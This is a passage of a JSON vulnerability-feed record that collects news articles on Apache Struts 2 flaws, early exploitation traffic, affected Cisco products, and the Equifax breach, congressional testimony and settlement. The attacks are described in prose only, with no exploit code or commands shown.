(CVE-2017-9804) also allows an unauthenticated, remote attacker to cause a denial of service (DoS) condition on an affected system but resides in the URLValidator feature of Apache Struts. \n \nCisco is testing its products against these vulnerabilities including its WebEx Meetings Server, the Data Center Network Manager, Identity Services Engine (ISE), MXE 3500 Series Media Experience Engines, several Cisco Prime products, some products for voice and unified communications, as well as video and streaming services. \n \nAt the current, there are no software patches to address the vulnerabilities in Cisco products, but the company promised to release updates for affected software which will soon be accessible through the [Cisco Bug Search Tool](<https://bst.cloudapps.cisco.com/bugsearch/bug/BUGID>). \n \nSince the framework is being widely used by a majority of top 100 fortune companies, they should also check their infrastructures against these vulnerabilities that incorporate a version of Apache Struts2.\n", "cvss3": {}, "published": "2017-09-11T23:50:00", "type": "thn", "title": "Apache Struts 2 Flaws Affect Multiple Cisco Products", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-9804", "CVE-2017-5638", "CVE-2017-9793", "CVE-2017-9805", "CVE-2017-12611"], "modified": "2017-09-12T10:51:16", "id": "THN:3F47D7B66C8A65AB31FAC5823C96C34D", "href": "https://thehackernews.com/2017/09/apache-struts-flaws-cisco.html", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "threatpost": [{"lastseen": "2018-10-06T22:53:58", "description": "Malicious traffic stemming from exploits against the [Apache Struts 2 vulnerability](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>) disclosed and [patched](<https://cwiki.apache.org/confluence/display/WW/S2-045>) this week has tapered off since Wednesday.\n\nResearchers at Rapid7 published an [analysis](<https://community.rapid7.com/community/infosec/blog/2017/03/09/apache-jakarta-vulnerability-attacks-in-the-wild>) of data collected from its honeypots situated on five major cloud providers and a number of private networks that shows a couple of dozen sources have targeted this vulnerability, but only two, originating in China, have actually sent malicious commands.\n\nCisco Talos said on Thursday that attacks had [risen sharply](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>) since word leaked of publicly available exploits and a [Metasploit module](<https://github.com/rapid7/metasploit-framework/issues/8064>). But it conceded that it was difficult to ascertain whether probes for vulnerable Apache servers could be carried out benignly.\n\nRapid7 said that in a 72-hour period starting Tuesday, a handful of events cropped up peaking at fewer than 50 between 11 a.m. and 6 p.m. Wednesday.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2017/03/06230023/pastedImage_1.png>)\n\n\u201cWe are really seeing limited attempts to exploit the vulnerability,\u201d said Tom Sellers, threat analyst and security researcher at Rapid7. \u201cFor context, please keep in mind that our data is from honeypots hosted in cloud providers and may not reflect what other sensors and organizations are seeing.\u201d\n\nCraig Williams, Cisco Talos senior technical lead, said researchers there are seeing attack traffic trending downward as well.\n\n\u201cEarly indicators and past experiences were pointing to this being an ongoing issue with attackers continuing to seek out vulnerable machines. Interestingly, over the last couple days, we have seen a slowing of activity,\u201d Williams said. \u201cBecause this is so unusual, we are continuing to monitor the situation in case the trend starts moving in the other direction. Again, this is not typical for this type of issue but great news all the same.\u201d\n\nThe vulnerability is in the Jakarta Multipart parser that comes with Apache. An attacker can trivially exploit the vulnerability to gain remote code execution by sending a HTTP request that contains a crafted Content-Type value. The vulnerable software will throw an exception in such cases.\n\n\u201cWhen the software is preparing the error message for display, a flaw in the Apache Struts Jakarta Multipart parser causes the malicious Content-Type value to be executed instead of displayed,\u201d Sellers wrote in an analysis published yesterday.\n\nThe vulnerability was disclosed and patched on Monday, and by Tuesday, Rapid7 was seeing two malicious requests from a host geo-located in Zhengzhou, China. The attacks arrived in HTTP GET requests and issued commands to the vulnerable webserver for it to download binaries from the attacker-controlled server on the internet. Sellers called it a standard command-injection attack against a webserver where the attacker is able to write code that instructs the server to reach out to an IP address and download code that executes on the server.\n\nThe second attack was spotted Wednesday when a host in Shanghai, China sent HTTP POST requests to servers instructing them to disable their firewall and grab code related to the XOR DDoS malware family.\n\n\u201cWhile we\u2019ve seen a couple dozen sources exploiting the vulnerability, only those two issued malicious commands,\u201d Sellers said. \u201cWe\u2019ve actually seen a drop off in related traffic since Wednesday. The most active attacker stopped on Thursday around 4 a.m. U.S. Central time.\u201d\n\nSellers said it\u2019s unclear as to why there\u2019s been a dropoff in malicious traffic.\n\n\u201cIt could be caused by a number of factors. The malicious payload is pretty obvious and easy to filter if traffic is inspected,\u201d Sellers said. \u201cAttackers might be prioritizing other vulnerabilities such as the ones announced in cameras recently. The lull may be temporary and we may see activity rise again after attention moves on to efforts.\u201d\n\nCisco raised the issue of IoT devices running the vulnerable Apache software as well, which could be an indicator of initial interest from DDoS bots.\n\n\u201cGiven the low sample size it\u2019s difficult for me to say.It\u2019s possible that DDoS bots are the early adopters since infection would generate easy, repeatable income and the code was trivial to port to existing frameworks,\u201d Sellers said. \u201cCompare that to ransomware, where a new deployment mechanism may need to be written but would likely only result in a single payout per host.\u201d\n\nResearchers were also seeing a number of requests probing for additional vulnerable servers that included whoami and ifconfig, commands that are relatively benign but could return information about what context the server is running in. Servers running at root\u2014an uncommon practice\u2014are most at risk.\n", "cvss3": {}, "published": "2017-03-10T10:51:01", "type": "threatpost", "title": "Apache Attack Traffic Dropping, Limited to Few Sources", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-10T16:12:17", "id": "THREATPOST:AACAA4F654495529E053D43901F00A81", "href": "https://threatpost.com/apache-attack-traffic-dropping-limited-to-few-sources/124227/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:27:47", "description": "Equifax said that an additional 2.4 million Americans have had their [personal data](<https://investor.equifax.com/news-and-events/news/2018/03-01-2018-140531340>) stolen as part of the company\u2019s massive 2017 data breach, including their names and some of their driver\u2019s license information.\n\nThe additional identified victims bring the total of those implicated in what has become the largest data breach of personal information in history to around 148 million people.\n\nThe consumer credit reporting agency on Thursday said that as part of an \u201congoing analysis\u201d it found that these newly identified victims\u2019 names and partial driver\u2019s license numbers were stolen by attackers. However, unlike the previous 145.5 million people who have been identified to date as impacted by the 2017 breach, the Social Security numbers of these additional victims were not impacted.\n\nAttackers were also unable to reach additional license details for this latest slew of impacted victims \u2013 including the state where their licenses were issued and the expiration dates.\n\n\u201cThis is not about newly discovered stolen data,\u201d Paulino do Rego Barros, Jr., interim chief executive officer of Equifax, said in a statement. \u201cIt\u2019s about sifting through the previously identified stolen data, analyzing other information in our databases that was not taken by the attackers, and making connections that enabled us to identify additional individuals.\u201d\n\nEquifax said the new victims were not previously identified because their Social Security numbers were not stolen together with their driver\u2019s license information.\n\n\u201cThe methodology used in the company\u2019s forensic examination of last year\u2019s cybersecurity incident leveraged Social Security Numbers (SSNs) and names as the key data elements to identify who was affected by the cyberattack,\u201d said the company in a statement. \u201cThis was in part because forensics experts had determined that the attackers were predominately focused on stealing SSNs.\u201d\n\nEquifax said it will notify the newly identified consumers directly by U.S. Postal mail, \u201cand will offer identity theft protection and credit file monitoring services at no cost to them,\u201d said the company.\n\nThe company did not respond to requests for further comment from Threatpost about its current ongoing analysis of the breach.\n\n**Ongoing Breach Disclosures**\n\nEquifax has been under public scrutiny since September, that\u2019s when it first disclosed the data breach after issuing a statement at the time that cybercriminals had exploited an unnamed \u201cU.S. website application vulnerability to gain access to certain files\u201d from May through July 2017. Equifax said it discovered the breach on July 29. The breach enabled criminals to access sensitive data like social security numbers, birth dates, and license numbers.\n\nLater, during Equifax\u2019s testimony in October before the U.S. House Committee on Energy and Commerce Subcommittee on Digital Commerce and Consumer Protection, it was revealed that Equifax was notified in March that the breach was tied to an unpatched [Apache Struts vulnerability, CVE-2017-5638](<https://threatpost.com/oracle-patches-apache-struts-reminds-users-to-update-equifax-bug/128151/>). It was established that while Equifax said it had requested the \u201capplicable personnel responsible\u201d to update the vulnerability it never was fixed.\n\n\u201cIt appears that the breach occurred because of both human error and technology failures,\u201d Richard Smith, Equifax CEO at the time, wrote in a [testimony](<http://docs.house.gov/meetings/IF/IF17/20171003/106455/HHRG-115-IF17-Wstate-SmithR-20171003.pdf>) that was released at the hearing in October.\n\nMaking the breach worse was Equifax\u2019s further botched response to the breach.\n\nAfter the breach was revealed in September, the company\u2019s site was crushed with traffic from concerned customers that left the site unreachable. In a separate instance in October, the Equifax site came under fire for harboring [adware](<https://threatpost.com/equifax-takes-down-compromised-page-redirecting-to-adware-download/128406/>) in a third-party partner\u2019s Flash Player download.\n\nThe extent and scope of the breach also has been continually expanding since it was first disclosed in September. In October, after an analysis with security company Mandiant, the company said that an [additional](<https://threatpost.com/equifax-says-145-5m-affected-by-breach-ex-ceo-testifies/128247/>) 2.5 million customers were also impacted on top of the 143 million the company initially said were affected.\n\nMeanwhile, in February, documents submitted by Equifax to the US Senate Banking Committee revealed that attackers also accessed taxpayers identification numbers, email addresses, and credit card expiration dates for certain customers.\n\n**Renewed Anger**\n\nThis latest slew of impacted customers has renewed anger against the company, with some demanding stricter legislation for data protection \u2013 such as the proposed Data Breach Prevention and Compensation Act, which would impose strict security-related fines on credit reporting agencies.\n\n> My office is continuing our investigation of [#Equifax](<https://twitter.com/hashtag/Equifax?src=hash&ref_src=twsrc%5Etfw>) so we can get to the bottom of how this disastrous data breach happened. \n> \n> We also need to change the law.\n> \n> \u2014 Eric Schneiderman (@AGSchneiderman) [March 1, 2018](<https://twitter.com/AGSchneiderman/status/969229077814108160?ref_src=twsrc%5Etfw>)\n\n> This is unacceptable. The California Department of Justice will continue to get to the bottom of this massive cybersecurity incident. We are committed to holding [#Equifax](<https://twitter.com/hashtag/Equifax?src=hash&ref_src=twsrc%5Etfw>) accountable to the fullest extent of the law. <https://t.co/fRPrUWcIyg>\n> \n> \u2014 Xavier Becerra (@AGBecerra) [March 1, 2018](<https://twitter.com/AGBecerra/status/969330796774359040?ref_src=twsrc%5Etfw>)\n\nEquifax, meanwhile, continues to remain under investigation by several federal and state agencies, including a probe by the Consumer Financial Protection Bureau.\n\nCustomers can see if their personal information has been breached by clicking on an \u201cAm I Impacted\u201d tool on Equifax\u2019s [website](<https://www.equifaxsecurity2017.com/>). The company also advised consumers to visit its web portal where they can review their account statements and credit reports, identify any unauthorized activity, and protect their personal information from attack.\n\nThe company handles data on more than 820 million customers and 91 million businesses worldwide.\n", "cvss3": {}, "published": "2018-03-02T15:12:57", "type": "threatpost", "title": "Equifax Says 2.4 Million More People Impacted By Massive 2017 Breach", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2018-03-02T15:12:57", "id": "THREATPOST:AD5395CA5B3FD95FAD8E67B675D0AFCA", "href": "https://threatpost.com/equifax-adds-2-4-million-more-people-to-list-of-those-impacted-by-2017-breach/130209/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:28:31", "description": "Equifax, the credit agency behind this summer\u2019s breach of 143 million Americans, said this week the number of victims implicated in the breach has increased.\n\nPaulino do Rego Barros, Jr., the company\u2019s interim CEO, [announced Monday](<https://www.equifaxsecurity2017.com/>) that 2.5 million additional Americans were also impacted, bringing the grand total to 145.5 million affected individuals.\n\nEquifax initially called its investigation around the breach \u201csubstantially complete,\u201d but said it was still carrying out further analysis with Mandiant, a FireEye company it hired to investigate the breach, on the incident. According to Equifax, investigators didn\u2019t find any additional vulnerabilities. The extra 2.5 million Americans figure came \u201cduring Mandiant\u2019s completion of the remaining investigative tasks and quality assurance procedures built into the investigative process.\u201d\n\nThe company used the opportunity on Monday to reiterate that Canadian citizens were also impacted, although far fewer than initially thought. The company said there may have been up to 100,000 Canadians affected several weeks ago however upon closer inspection, only 8,000 Canadian consumers were affected by the breach.\n\nEquifax says its still analyzing exactly how many United Kingdom consumers have been affected by the breach and is in the middle discussions with regulators to determine how to notify them.\n\nDetails about the breach came out the day before Richard Smith, Equifax\u2019s former CEO, was scheduled to testify about the breach before the U.S. House Committee on Energy and Commerce Subcommittee on Digital Commerce and Consumer Protection. Smith, former Equifax chairman and chief executive, [retired last Tuesday](<https://threatpost.com/oracle-patches-apache-struts-reminds-users-to-update-equifax-bug/128151/>) in wake of the breach.\n\nIn a [written testimony (.PDF)](<http://docs.house.gov/meetings/IF/IF17/20171003/106455/HHRG-115-IF17-Wstate-SmithR-20171003.pdf>) released in tandem with the subcommittee hearing, Smith blamed the breach on a combination of \u201chuman error and technology failures.\u201d\n\n\u201cThese mistakes \u2013 made in the same chain of security systems designed with redundancies \u2013 allowed criminals to access over 140 million Americans\u2019 data,\u201d Smith wrote.\n\nIn the testimony Smith claimed that the U.S. Department of Homeland Security\u2019s Computer Emergency Readiness Team (U.S. CERT) notified Equifax on March 8 that [it needed to patch CVE-2017-5638](<https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/>), the Apache Struts vulnerability that eventually led to the hack.\n\nEquifax requested the \u201capplicable personnel responsible\u201d update Apache Struts via email on March 9, something that should have been done within a 48 hour period, Smith said.\n\nThat was never done and according to Smith, the vulnerability wasn\u2019t picked up by internal scans designed to identify vulnerable systems carried out on March 15. The issue lingered for roughly two months until attackers accessed Equifax\u2019s systems on May 13 \u2013 and persisted until the company became aware of the attackers on July 30.\n\nGreg Walden (R-Ore.) pointed out some of Equifax\u2019s many missteps on Tuesday morning, including how Equifax\u2019s consumer facing website for the breach was put hosted on a separate domain from the main Equifax website, the confusion that spawned, and how on multiple occasions Equifax directed users to the wrong website.\n\n\u201cOn top of all the other issues, multiple times Equifax tweeted the wrong URL directing consumers to the wrong website to check if they were part of a breach,\u201d Walden said, \u201cTalk about ham-handed responses this is simply unacceptable and it makes me wonder if there was a breach response plan in place at all and if anyone was in charge of executing that plan.\u201d\n\nDuring another part of the hearing, Tim Murphy, a U.S. representative for Pennsylvania\u2019s 18th Congressional district, came back to that question. When told the company\u2019s original site couldn\u2019t handle the traffic is received, Murphy was befuddled.\n\n\u201cWhy wouldn\u2019t your website be able to handle this kind of traffic?\u201d Murphy asked, \u201cIt just doesn\u2019t make sense, a company your size and with your knowledge, doesn\u2019t understand how to handle traffic for over 100 million people, don\u2019t you use an Elastic cloud computing service that would\u2019ve accounted for this?\u201d\n\nSmith said the sheer amount of traffic Equifax\u2019s site received in wake of the breach made hosting a site on its domain impossible.\n\n\u201cThe environment the micro site is in is a cloud environment that\u2019s very, very scalable,\u201d Smith said. \u201cOur traditional environment could not handle 400 million consumer visits for three weeks.\u201d\n\nMurphy also grilled Smith on what took Equifax so long to patch the March vulnerability and if it\u2019s possible Equifax\u2019s internal scanning system could potentially miss another vulnerability.\n\n\u201cIf the patch only took a few days to apply why did Equifax fail to apply it in March when it was announced as critical?\u201d Murphy asked.\n\nSmith skirted the question and instead discussed the difficulties associated with patching.\n\n\u201cPatching can take a variety of time\u2026 it can take days or up to a week or more,\u201d Smith said, adding that he wasn\u2019t aware of the particular Struts vulnerability at the time.\n\nAt the end of the hearing, when pressed by Anna Eshoo, U.S. Representative for California\u2019s 18th congressional district, Smith described the process around patching again but did little to deviate from his prepared testimony.\n\n\u201cI want to know when they did it, when they took care of [the patch]\u201d Eshoo said.\n\n\u201cThey took care of it in July because we never found it,\u201d Smith said. \u201cWe had the human error, we did the scan, the technology never found it, in July we found suspicious activity, took the portal down, found the vulnerability, applied the patch.\u201d\n", "cvss3": {}, "published": "2017-10-03T15:27:08", "type": "threatpost", "title": "Equifax Says 145.5M Affected by Breach, Ex-CEO Testifies", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-10-03T15:27:08", "id": "THREATPOST:5E633FD1C6A5B5BB74F1B6A8399001A2", "href": "https://threatpost.com/equifax-says-145-5m-affected-by-breach-ex-ceo-testifies/128247/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2020-04-11T11:42:25", "description": "Equifax will pay as much as $700 million to settle federal and state investigations on the heels of its infamous 2017 breach, which exposed the data of almost 150 million customers.\n\nThe consumer credit reporting agency on Monday [said](<https://investor.equifax.com/news-and-events/news/2019/07-22-2019-125543228>) it will dish out $300 million to cover free credit monitoring services for impacted consumers, $175 million to 48 states in the U.S, and $100 million in civil penalties to the Consumer Financial Protection Bureau (CFPB). If the initial amount does not cover consumer losses, the company may need to pay an additional $125 million.\n\n\u201cCompanies that profit from personal information have an extra responsibility to protect and secure that data,\u201d said Federal Trade Commission (FTC) Chairman Joe Simons [in a statement](<https://www.ftc.gov/news-events/press-releases/2019/07/equifax-pay-575-million-part-settlement-ftc-cfpb-states-related?utm_source=slider>). \u201cEquifax failed to take basic steps that may have prevented the breach that affected approximately 147 million consumers. This settlement requires that the company take steps to improve its data security going forward, and will ensure that consumers harmed by this breach can receive help protecting themselves from identity theft and fraud.\u201d\n\n[](<https://threatpost.com/newsletter-sign/>)\n\nEquifax, which handles data associated with more than 820 million customers and 91 million businesses worldwide, has been under public scrutiny since September 2017 when [it disclosed](<https://threatpost.com/equifax-says-breach-affects-143-million-americans/127880/>) a data breach that impacted almost 150 million Americans. The attackers managed to [access information](<https://threatpost.com/equifax-data-nation-state/141929/>) containing Social Security numbers, birth dates, addresses, and some driver\u2019s license numbers. Equifax said it discovered the intrusion on July 29, meaning attackers apparently had access to the company\u2019s files for nearly 12 weeks.\n\nAfter the data breach, Equifax was hit by multiple lawsuits, as well as investigations by the FTC, the CFPB, the Attorneys General of 48 states, and more.\n\n[](<https://media.threatpost.com/wp-content/uploads/sites/103/2019/07/22101929/eqfx-socmed-summary.png>)\n\nLawsuits claimed that Equifax failed to patch its network in March 2017 after being alerted of a [critical security flaw](<https://threatpost.com/equifax-adds-2-4-million-more-people-to-list-of-those-impacted-by-2017-breach/130209/>) (an Apache Struts vulnerability, CVE-2017-5638) in its Equifax Automated Consumer Interview System database (which handles inquiries from consumers about their personal credit data). This vulnerability was ultimately exploited by bad actors, leading to the data breach.\n\nAs part of the agreement, Equifax also said it will take steps to enhance its information security and technology program, as well as make payments totaling $290.5 million to state and federal regulatory agencies to pay attorneys\u2019 fees and costs in the multi-district litigation.\n\nIn the past month, a slew of fines and penalties have been imposed that were tied privacy and data breach incidents. Earlier in July, the [FTC slapped](<https://threatpost.com/privacy-experts-facebooks-5b-fine/146478/>) a $5 billion fine on Facebook for privacy violations following its Cambridge Analytica incident. Also hit with security-related fines in July were [Marriott](<https://threatpost.com/marriott-123m-fine-data-breach/146320/>) ($123 million) and [British Airways](<https://threatpost.com/post-data-breach-british-airways-slapped-with-record-230m-fine/146272/>) ($230 million).\n\nWhile opinions are mixed about the appropriate penalty for these companies and Equifax, security experts for their part hope that other companies will take note of the fines when it comes to data security and privacy.\n\n\u201cI\u2019m far from an Equifax apologist, but the truth is it could have been anyone,\u201d Adam Laub, chief marketing officer at STEALTHbits Technologies said in an email. \u201cIt\u2019s not an excuse, but rather the reality we live in. The best outcome isn\u2019t Equifax making the situation right \u2013 although that is important for all of those affected \u2013 it\u2019s everyone else learning that the price to be paid outweighs the inconvenience of ensuring proper measures are taken to secure the data that puts them at risk in the first place. And it\u2019s got to be from the ground up too. There\u2019s no silver bullet.\u201d\n\n**_Interested in more on patch management? Don\u2019t miss our free live _**[**_Threatpost webinar_**](<https://attendee.gotowebinar.com/register/1579496132196807171?source=ART>)**_, \u201c_****_Streamlining Patch Management,\u201d on Wed., July 24, at 2:00 p.m. EDT. Please join Threatpost editor Tom Spring and a panel of patch experts as they discuss the latest trends in Patch Management, how to find the right solution for your business and what the biggest challenges are when it comes to deploying a program. _****_[Register and Learn More](<https://attendee.gotowebinar.com/register/1579496132196807171?source=ART>)_**\n", "cvss3": {}, "published": "2019-07-22T14:31:39", "type": "threatpost", "title": "Equifax to Pay $700 Million in 2017 Data Breach Settlement", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2019-07-22T14:31:39", "id": "THREATPOST:5ADABEB29891532ECFF2D6ABD99CAED4", "href": "https://threatpost.com/equifax-to-pay-700-million-in-2017-data-breach-settlement/146579/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-10-06T22:53:59", "description": "Public attacks and scans looking for exposed Apache webservers have ramped up dramatically since Monday when a vulnerability in the Struts 2 web application framework was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-045>) and proof-of-concept exploit code was introduced into Metasploit.\n\nThe vulnerability, [CVE-2017-5638](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>), was already under attack in the wild prior to Monday\u2019s disclosure, but since then, the situation has worsened and experts fear it\u2019s going to linger for a while.\n\n\u201cThe second someone starts working on a [Metasploit module](<https://github.com/rapid7/metasploit-framework/issues/8064>), it\u2019s a ramp-up for rapid exploitation by a large number of people,\u201d said Craig Williams, senior technical leader for Cisco\u2019s Talos research outfit. \u201cWe\u2019re basically seeing a huge number of people continue to exploit the vulnerability. That\u2019s likely going to continue to increase. I think what we\u2019re also going to see is people going to try to scan for the vulnerability.\u201d\n\nThe flaw lives in the Jakarta Multipart parser upload function in Apache. It allows an attacker to easily make a maliciously crafted request (a malicious Content-Type value) to an Apache webserver and have it execute. Struts 2.3.5 to Struts 2.3.31 are affected as are Struts 2.5 to 2.5.10; admins are urged to upgrade immediately to [Struts 2.3.32](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.3.32>) or [2.5.10.1](<https://cwiki.apache.org/confluence/display/WW/Version+Notes+2.5.10.1>).\n\nTalk of the vulnerability surfaced on Chinese forums, according to Vincente Motos, who posted an advisory on the [HackPlayers](<http://www.hackplayers.com/2017/03/exploit-rce-para-apache-struts-cve-2017-5638.html>) website. Motos said a notorious Apache Struts hacker known as Nike Zheng posted a public proof-of-concept exploit demonstrating the simplicity in which an attacker could inject operating system commands.\n\nThe attacks are particularly risky to anyone running their Apache webservers as root, which is not a suggested practice. Williams said it\u2019s unclear whether an attacker can benignly scan for vulnerable servers in order to determine the version and context under which Struts is running, whether as Apache or root, for example. But as with some older internet-wide bugs, there are a large number of scans happening.\n\n\u201c[Attacks] look like requests to a webserver with a malformed piece,\u201d Williams said. \u201cUnless you\u2019re looking for it, it\u2019s easy not to see the malformed content type.\u201d\n\nAn attacker, he said, would need to just modify one line depending on the operating system the target is running, Windows or Linux, and have it download a malicious binary from the web.\n\n\u201cUnfortunately, due to the nature of command-line injections like this, it\u2019s very easy to modify,\u201d Williams said. \u201cAnd that\u2019s why I think we\u2019re going to continue to see exploitation rise for the foreseeable future.\u201d\n\nThe risks are severe for an organization running an exposed Apache server if it\u2019s compromised.\n\n\u201cThe sky\u2019s the limit,\u201d Williams said. \u201cIf I\u2019m a bad guy, depending on what my game is, I can take over your webserver and use that to move laterally through your network. If I\u2019m super insidious, I can use that to look for your domain controller and if I can find a way to compromise your password hashes, say from the Linux server I compromised, I can possibly log in to your domain controller and use that to push malware to all your machines. I could ransom off your webserver, all kinds of terrible things.\u201d\n\nWilliams said [Cisco has observed](<http://blog.talosintelligence.com/2017/03/apache-0-day-exploited.html>) that the majority of public attacks feature a number of Linux bots used for DDoS attacks taking advantage of this vulnerability, along with an IRC bouncer, and a malware sample related to the bill gates botnet.\n\nWilliams cautioned as well that connected devices in the IoT space could also be a major concern, since Struts 2 likely runs there.\n\n\u201cI\u2019m going to guess there\u2019s a reasonable number of devices running it, and due to the nature of IoT, those aren\u2019t going to be patched any time soon. So this is going to be an issue for the foreseeable future.\u201d\n\nGiven the availability of patches and detection rules, it\u2019s likely that public attacks are going to be largely mitigated and as more detection rules surface, public exploits should be less useful to attackers.\n\n\u201cDue to the fact that it\u2019s relatively easy to go inside and modify an attack, it\u2019s going to be bad and it\u2019s going to plague us for some time,\u201d Williams said. \u201cGood news is that detecting it is not that difficult.\u201d\n", "cvss3": {}, "published": "2017-03-09T12:25:46", "type": "threatpost", "title": "Attacks Heating Up Against Apache Struts 2 Vulnerability", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638"], "modified": "2017-03-09T19:50:52", "id": "THREATPOST:1C2F8B65F8584E9BF67617A331A7B993", "href": "https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-10-06T22:53:11", "description": "The Apache Software Foundation has patched a critical remote code execution vulnerability affecting all versions of the popular application development framework Struts since 2008.\n\nAll web applications using the framework\u2019s REST plugin are vulnerable. Users are advised to upgrade their Apache Struts components as a matter of urgency, according to Semmle, a software engineering analytics firm that first identified the bug.\n\n\u201cThis particular vulnerability allows a remote attacker to execute arbitrary code on any server running an application built using the Struts framework and the popular REST communication plugin. The weakness is caused by the way Struts deserializes untrusted data,\u201d the company wrote in [a technical write-up](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) on the vulnerability published on Tuesday in coordination with the release of a patch by Apache Software Foundation (ASF).\n\n\u201cThis is as serious as it gets; if remote attackers are allowed to exploit the newly identified vulnerability it can critically damage thousands of enterprises,\u201d said Oege de Moor, CEO and founder of Semmle.\n\nAffected developers are urged to [upgrade to Apache Struts version 2.5.13](<https://struts.apache.org/announce.html#a20170905>).\n\nThe ASF said there is no workaround available for the vulnerability ([CVE-2017-9805](<https://struts.apache.org/docs/s2-052.html>)) in Struts, an open-source framework for developing web applications in the Java programming language.\n\n\u201cThe best option (sans an upgrade) is to remove the Struts REST plugin when not used or limit it to server normal pages and JSONs only,\u201d the ASF wrote in a [security bulletin issued Tuesday](<https://struts.apache.org/docs/s2-052.html>).\n\nSemmle cites estimates the vulnerability could impact 65 percent of the Fortune 100 companies that use web applications built with the Struts framework.\n\n\u201cOrganizations like Lockheed Martin, the IRS, Citigroup, Vodafone, Virgin Atlantic, Reader\u2019s Digest, Office Depot, and Showtime are known to have developed applications using the framework. This illustrates how widespread the risk is,\u201d Semmle researcher Bas van Schaik wrote Tuesday, citing estimates by analysts at the software developer research firm RedMonk.\n\nMultiple similar vulnerabilities have been reported tied to Struts. Earlier this year, attackers were exploiting a critical Apache Struts vulnerability on Windows servers and dropping Cerber ransomware on the machines.\n\n[In March](<https://threatpost.com/attacks-heating-up-against-apache-struts-2-vulnerability/124183/>), public attacks and scans looking for exposed Apache webservers were reportedly on the rise after a vulnerability ([CVE-2017-5638](<https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-5638>)) in the Struts 2 web application framework was [patched](<https://cwiki.apache.org/confluence/display/WW/S2-045>) and proof-of-concept exploit code was introduced into Metasploit.\n\nSemmle said this most recent vulnerability is caused by the way Struts deserializes untrusted data. Deserialization is the processes of taking structured data from one format and rebuilding it into an object. The processes can be tweaked for malicious intent and has been used in a host of attack scenarios including denial-of-service, access control and remote code execution attacks.\n\nThe remote code execution attack Semmle identified is possible when using the Struts REST plugin with the XStream handler to facilitate XML payloads. XStream is a Java library used to serialize objects to XML (or JSON) and back again.\n\n\u201cLgtm (Semmle\u2019s open-source [code analysis tool](<https://lgtm.com/>)) identifies alerts in code using queries written in a specially-designed language: QL. One of the many queries for Java detects potentially unsafe deserialization of user-controlled data. The query identifies situations in which unsanitized data is deserialized into a Java object. This includes data that comes from an HTTP request or from any other socket connection,\u201d Semmle said in a [second technical analysis of the vulnerability](<https://lgtm.com/blog/apache_struts_CVE-2017-9805_announcement>) posted Tuesday.\n\nData contained in one of the arguments (toObject) should be considered \u201ctainted\u201d and \u201cunder the control of a remote user and should not be trusted.\u201d This query detects common ways through which user-controlled data flows to a deserialization method, researchers said. \u201cHowever, some projects use a slightly different approach to receive remote user input,\u201d they said.\n\nSemmle said it has developed a \u201csimple\u201d working exploit for this vulnerability but currently has no plans to disclose it.\n\n\u201cThere is no suggestion that an exploit is publicly available, but it is likely that one will soon be,\u201d van Schaik wrote in a blog post.\n", "cvss3": {}, "published": "2017-09-05T14:10:54", "type": "threatpost", "title": "Patch Released for Critical Apache Struts Bug", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2017-5638", "CVE-2017-9805"], "modified": "2017-09-05T18:44:40", "id": "THREATPOST:7DFB677F72D6258B3CDEE746C764E29E", "href": "https://threatpost.com/patch-released-for-critical-apache-struts-bug/127809/", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-01-23T05:28:22", "description": "Oracle patched 250 vulnerabilities across hundreds of different products as part of its [quarterly Critical Patch Update](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>) released today.\n\nRounding out the list of products with the most patches is Oracle Fusion Middleware with 38, Oracle Hospitality Applications with 37 and Oracle MySQL with 25.\n\nOf the critical patches, security researchers at Onapsis said that they identified three high-risk SQL injections vulnerabilities in Oracle\u2019s popular Oracle E-Business Suite (EBS).\n\n\u201cWhile all three are high-risk vulnerabilities, one (CVE-2017-10332) is very easy to exploit,\u201d said JP Perez-Etchegoyen, CTO of Onapsis.\n\nOnapsis is warning users of Oracle EBS (versions 12.1 and 12.2) that they are exposed to SQL injection vulnerabilities that could allow an attacker, over a network without any username and password credentials, to potentially gain access to and modify critical documents and information such as credit card data, customer information, HR documents or financial records.\n\nPerez-Etchegoyen said each of the SQL injection vulnerabilities can easily be exploited by attackers who can disrupt, exfiltrate or manipulate data that is part of a business\u2019 enterprise resource planning, supply chain management or finance management systems.\n\n\u201cThese vulnerabilities are especially risky as an attacker would only need a web browser and network access to the EBS system HTTP interface to perform it,\u201d Perez-Etchegoyen said.\n\nOnapsis said vulnerabilities found in Oracle\u2019s EBS are on the 